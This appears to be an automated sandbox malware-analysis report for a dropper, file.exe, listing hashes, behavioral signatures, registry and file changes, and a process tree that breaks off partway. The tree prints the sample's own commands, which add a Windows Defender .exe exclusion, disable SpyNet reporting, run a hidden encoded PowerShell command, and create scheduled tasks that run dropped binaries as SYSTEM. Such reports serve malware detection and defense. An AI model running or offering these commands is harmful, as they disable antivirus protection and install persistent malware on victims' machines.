Analysis
-
max time kernel
91s -
max time network
139s -
platform
windows10-2004_x64 -
resource
win10v2004-20220812-en -
resource tags
arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system -
submitted
27-09-2022 18:29
Static task
static1
Behavioral task
behavioral1
Sample
file.exe
Resource
win7-20220812-en
General
-
Target
file.exe
-
Size
7.2MB
-
MD5
3b3d09345ad44e2122a5ddef64ef6abb
-
SHA1
ea3654ef2630810c967e05636abdca02c14b5bee
-
SHA256
6827de64c5c907041f2795b5c7db324a68ff3a44bb7c6ea9828e9ac47cb54161
-
SHA512
d9b4b0632aa0df6e4758747b6497c2a32749cfb4c0492fd9d7e87280e10071dcc316398033d48ca483088c04f905c6389e67a9d1adbc9be09d2c00dcd962a1bb
-
SSDEEP
196608:91O0mSOPS1loo2HeWnKcHvvMkbKHpEBD5wN+g4X28:3OzPSUo2BHvkkbK+BD5w0g49
Malware Config
Signatures
-
Blocklisted process makes network request 2 IoCs
flow pid Process 61 260 rundll32.exe 62 260 rundll32.exe -
Executes dropped EXE 4 IoCs
pid Process 2952 Install.exe 1948 Install.exe 3988 OQuasLB.exe 2588 Xvsmlts.exe -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rundll32.exe -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation Install.exe Key value queried \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation Xvsmlts.exe -
Loads dropped DLL 1 IoCs
pid Process 260 rundll32.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Drops Chrome extension 3 IoCs
description ioc Process File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\manifest.json Xvsmlts.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\meejmcfbiapijdfaadackoblffmidlig\1.0.0.0\manifest.json Xvsmlts.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\goiejopegncpjmocklmfiipofdbkhpic\1.0.0.0\manifest.json Xvsmlts.exe -
Drops desktop.ini file(s) 1 IoCs
description ioc Process File opened for modification C:\$RECYCLE.BIN\S-1-5-18\desktop.ini Xvsmlts.exe -
Drops file in System32 directory 31 IoCs
description ioc Process File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA Xvsmlts.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F07644E38ED7C9F37D11EEC6D4335E02_58589533BD741CABD9C6A1C2A7AAD4A1 Xvsmlts.exe File opened for modification C:\Windows\system32\GroupPolicy\gpt.ini OQuasLB.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 Xvsmlts.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies Xvsmlts.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\48F3BB146086CEF37D471FBE460215C9 Xvsmlts.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B398B80134F72209547439DB21AB308D_A4CF52CCA82D7458083F7280801A3A04 Xvsmlts.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\A16C6C16D94F76E0808C087DFC657D99_57084D1D86D9F07AD164FDFDC2CB1CB3 Xvsmlts.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData Xvsmlts.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 Xvsmlts.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA Xvsmlts.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F2DDCD2B5F37625B82E81F4976CEE400_D29849B2B3CC9118078AA61A670027D9 Xvsmlts.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\A16C6C16D94F76E0808C087DFC657D99_57084D1D86D9F07AD164FDFDC2CB1CB3 Xvsmlts.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content Xvsmlts.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5 Xvsmlts.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA Xvsmlts.exe File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol Xvsmlts.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE Xvsmlts.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache Xvsmlts.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 Xvsmlts.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA Xvsmlts.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B398B80134F72209547439DB21AB308D_A4CF52CCA82D7458083F7280801A3A04 Xvsmlts.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F2DDCD2B5F37625B82E81F4976CEE400_D29849B2B3CC9118078AA61A670027D9 Xvsmlts.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F07644E38ED7C9F37D11EEC6D4335E02_58589533BD741CABD9C6A1C2A7AAD4A1 Xvsmlts.exe File created C:\Windows\system32\GroupPolicy\gpt.ini Install.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log powershell.exe File created C:\Windows\system32\GroupPolicy\Machine\Registry.pol OQuasLB.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft Xvsmlts.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\48F3BB146086CEF37D471FBE460215C9 Xvsmlts.exe -
Drops file in Program Files directory 14 IoCs
description ioc Process File created C:\Program Files (x86)\VYxEjiIKDDwYC\jPjNdOf.dll Xvsmlts.exe File created C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi Xvsmlts.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi Xvsmlts.exe File created C:\Program Files\Mozilla Firefox\browser\omni.ja.bak Xvsmlts.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja.bak Xvsmlts.exe File created C:\Program Files (x86)\qmpQQWMVoUOWcEJKBJR\BquCyMX.xml Xvsmlts.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja Xvsmlts.exe File created C:\Program Files (x86)\WrbOaSOTQfUn\jWdOHAM.dll Xvsmlts.exe File created C:\Program Files (x86)\jNivjIkKU\rNNBKs.dll Xvsmlts.exe File created C:\Program Files (x86)\qmpQQWMVoUOWcEJKBJR\FedFxkG.dll Xvsmlts.exe File created C:\Program Files (x86)\jNivjIkKU\xYetWiD.xml Xvsmlts.exe File created C:\Program Files (x86)\HCxyEYsLPoBU2\ergNVNPBwKLsZ.dll Xvsmlts.exe File created C:\Program Files (x86)\HCxyEYsLPoBU2\vaygUsA.xml Xvsmlts.exe File created C:\Program Files (x86)\VYxEjiIKDDwYC\hKqIoZH.xml Xvsmlts.exe -
Drops file in Windows directory 4 IoCs
description ioc Process File created C:\Windows\Tasks\bGKvUxYEKJhmpNiCsB.job schtasks.exe File created C:\Windows\Tasks\GyQsokuHCPHrPIKjm.job schtasks.exe File created C:\Windows\Tasks\ydofTeYvCFRiBkl.job schtasks.exe File created C:\Windows\Tasks\BTdQtQCLlbasEjBtK.job schtasks.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 11 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 208 schtasks.exe 2904 schtasks.exe 4176 schtasks.exe 2796 schtasks.exe 1112 schtasks.exe 4304 schtasks.exe 4892 schtasks.exe 4900 schtasks.exe 4860 schtasks.exe 1856 schtasks.exe 5064 schtasks.exe -
Enumerates system info in registry 2 TTPs 4 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName Install.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName rundll32.exe -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" Xvsmlts.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\TelemetrySalt = "1" Xvsmlts.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{06969d78-0000-0000-0000-d01200000000}\MaxCapacity = "15140" Xvsmlts.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" Xvsmlts.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing Xvsmlts.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume Xvsmlts.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{06969d78-0000-0000-0000-d01200000000}\NukeOnDelete = "0" Xvsmlts.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" Xvsmlts.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer Xvsmlts.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" Xvsmlts.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ rundll32.exe -
Suspicious behavior: EnumeratesProcesses 40 IoCs
pid Process 1608 powershell.EXE 1608 powershell.EXE 4144 powershell.exe 4144 powershell.exe 4816 powershell.exe 4816 powershell.exe 1832 powershell.EXE 1832 powershell.EXE 2588 Xvsmlts.exe 2588 Xvsmlts.exe 2588 Xvsmlts.exe 2588 Xvsmlts.exe 2588 Xvsmlts.exe 2588 Xvsmlts.exe 2588 Xvsmlts.exe 2588 Xvsmlts.exe 2588 Xvsmlts.exe 2588 Xvsmlts.exe 2588 Xvsmlts.exe 2588 Xvsmlts.exe 2588 Xvsmlts.exe 2588 Xvsmlts.exe 2588 Xvsmlts.exe 2588 Xvsmlts.exe 2588 Xvsmlts.exe 2588 Xvsmlts.exe 2588 Xvsmlts.exe 2588 Xvsmlts.exe 2588 Xvsmlts.exe 2588 Xvsmlts.exe 2588 Xvsmlts.exe 2588 Xvsmlts.exe 2588 Xvsmlts.exe 2588 Xvsmlts.exe 2588 Xvsmlts.exe 2588 Xvsmlts.exe 2588 Xvsmlts.exe 2588 Xvsmlts.exe 2588 Xvsmlts.exe 2588 Xvsmlts.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
description pid Process Token: SeDebugPrivilege 1608 powershell.EXE Token: SeDebugPrivilege 4144 powershell.exe Token: SeDebugPrivilege 4816 powershell.exe Token: SeDebugPrivilege 1832 powershell.EXE -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2352 wrote to memory of 2952 2352 file.exe 81 PID 2352 wrote to memory of 2952 2352 file.exe 81 PID 2352 wrote to memory of 2952 2352 file.exe 81 PID 2952 wrote to memory of 1948 2952 Install.exe 82 PID 2952 wrote to memory of 1948 2952 Install.exe 82 PID 2952 wrote to memory of 1948 2952 Install.exe 82 PID 1948 wrote to memory of 3152 1948 Install.exe 83 PID 1948 wrote to memory of 3152 1948 Install.exe 83 PID 1948 wrote to memory of 3152 1948 Install.exe 83 PID 1948 wrote to memory of 2888 1948 Install.exe 85 PID 1948 wrote to memory of 2888 1948 Install.exe 85 PID 1948 wrote to memory of 2888 1948 Install.exe 85 PID 3152 wrote to memory of 660 3152 forfiles.exe 88 PID 3152 wrote to memory of 660 3152 forfiles.exe 88 PID 3152 wrote to memory of 660 3152 forfiles.exe 88 PID 2888 wrote to memory of 1352 2888 forfiles.exe 87 PID 2888 wrote to memory of 1352 2888 forfiles.exe 87 PID 2888 wrote to memory of 1352 2888 forfiles.exe 87 PID 660 wrote to memory of 4360 660 cmd.exe 89 PID 660 wrote to memory of 4360 660 cmd.exe 89 PID 660 wrote to memory of 4360 660 cmd.exe 89 PID 1352 wrote to memory of 4484 1352 cmd.exe 90 PID 1352 wrote to memory of 4484 1352 cmd.exe 90 PID 1352 wrote to memory of 4484 1352 cmd.exe 90 PID 660 wrote to memory of 3296 660 cmd.exe 91 PID 660 wrote to memory of 3296 660 cmd.exe 91 PID 660 wrote to memory of 3296 660 cmd.exe 91 PID 1352 wrote to memory of 1864 1352 cmd.exe 92 PID 1352 wrote to memory of 1864 1352 cmd.exe 92 PID 1352 wrote to memory of 1864 1352 cmd.exe 92 PID 1948 wrote to memory of 208 1948 Install.exe 96 PID 1948 wrote to memory of 208 1948 Install.exe 96 PID 1948 wrote to memory of 208 1948 Install.exe 96 PID 1948 wrote to memory of 3704 1948 Install.exe 98 PID 1948 wrote to memory of 3704 1948 Install.exe 98 PID 1948 wrote to memory of 3704 1948 Install.exe 98 PID 1608 wrote to memory of 4552 1608 powershell.EXE 103 PID 1608 wrote to memory of 4552 1608 powershell.EXE 103 PID 1948 wrote to memory of 1200 1948 Install.exe 110 PID 1948 wrote to memory of 1200 1948 Install.exe 110 PID 1948 wrote to memory of 1200 1948 Install.exe 110 PID 1948 wrote to memory of 2904 1948 Install.exe 112 PID 1948 wrote to memory of 2904 1948 Install.exe 112 PID 1948 wrote to memory of 2904 1948 Install.exe 112 PID 3988 wrote to memory of 4144 3988 OQuasLB.exe 116 PID 3988 wrote to memory of 4144 3988 OQuasLB.exe 116 PID 3988 wrote to memory of 4144 3988 OQuasLB.exe 116 PID 4144 wrote to memory of 2424 4144 powershell.exe 118 PID 4144 wrote to memory of 2424 4144 powershell.exe 118 PID 4144 wrote to memory of 2424 4144 powershell.exe 118 PID 2424 wrote to memory of 1728 2424 cmd.exe 119 PID 2424 wrote to memory of 1728 2424 cmd.exe 119 PID 2424 wrote to memory of 1728 2424 cmd.exe 119 PID 4144 wrote to memory of 2460 4144 powershell.exe 120 PID 4144 wrote to memory of 2460 4144 powershell.exe 120 PID 4144 wrote to memory of 2460 4144 powershell.exe 120 PID 4144 wrote to memory of 2152 4144 powershell.exe 121 PID 4144 wrote to memory of 2152 4144 powershell.exe 121 PID 4144 wrote to memory of 2152 4144 powershell.exe 121 PID 4144 wrote to memory of 3744 4144 powershell.exe 122 PID 4144 wrote to memory of 3744 4144 powershell.exe 122 PID 4144 wrote to memory of 3744 4144 powershell.exe 122 PID 4144 wrote to memory of 1836 4144 powershell.exe 123 PID 4144 wrote to memory of 1836 4144 powershell.exe 123
Processes
-
C:\Users\Admin\AppData\Local\Temp\file.exe"C:\Users\Admin\AppData\Local\Temp\file.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:2352 -
C:\Users\Admin\AppData\Local\Temp\7zS834E.tmp\Install.exe.\Install.exe2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2952 -
C:\Users\Admin\AppData\Local\Temp\7zS862C.tmp\Install.exe.\Install.exe /S /site_id "525403"3⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks computer location settings
- Drops file in System32 directory
- Enumerates system info in registry
- Suspicious use of WriteProcessMemory
PID:1948 -
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"4⤵
- Suspicious use of WriteProcessMemory
PID:3152 -
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&5⤵
- Suspicious use of WriteProcessMemory
PID:660 -
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:326⤵PID:4360
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:646⤵PID:3296
-
-
-
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"4⤵
- Suspicious use of WriteProcessMemory
PID:2888 -
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&5⤵
- Suspicious use of WriteProcessMemory
PID:1352 -
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:326⤵PID:4484
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:646⤵PID:1864
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gYlZYcqIq" /SC once /ST 18:27:02 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="4⤵
- Creates scheduled task(s)
PID:208
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gYlZYcqIq"4⤵PID:3704
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gYlZYcqIq"4⤵PID:1200
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bGKvUxYEKJhmpNiCsB" /SC once /ST 20:30:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\gnTHsduzYZxvJbBhx\edOhJgpRjaWAiDb\OQuasLB.exe\" G6 /site_id 525403 /S" /V1 /F4⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:2904
-
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1608 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force2⤵PID:4552
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum1⤵PID:4592
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc1⤵PID:3920
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:1440
-
C:\Users\Admin\AppData\Local\Temp\gnTHsduzYZxvJbBhx\edOhJgpRjaWAiDb\OQuasLB.exeC:\Users\Admin\AppData\Local\Temp\gnTHsduzYZxvJbBhx\edOhJgpRjaWAiDb\OQuasLB.exe G6 /site_id 525403 /S1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of WriteProcessMemory
PID:3988 -
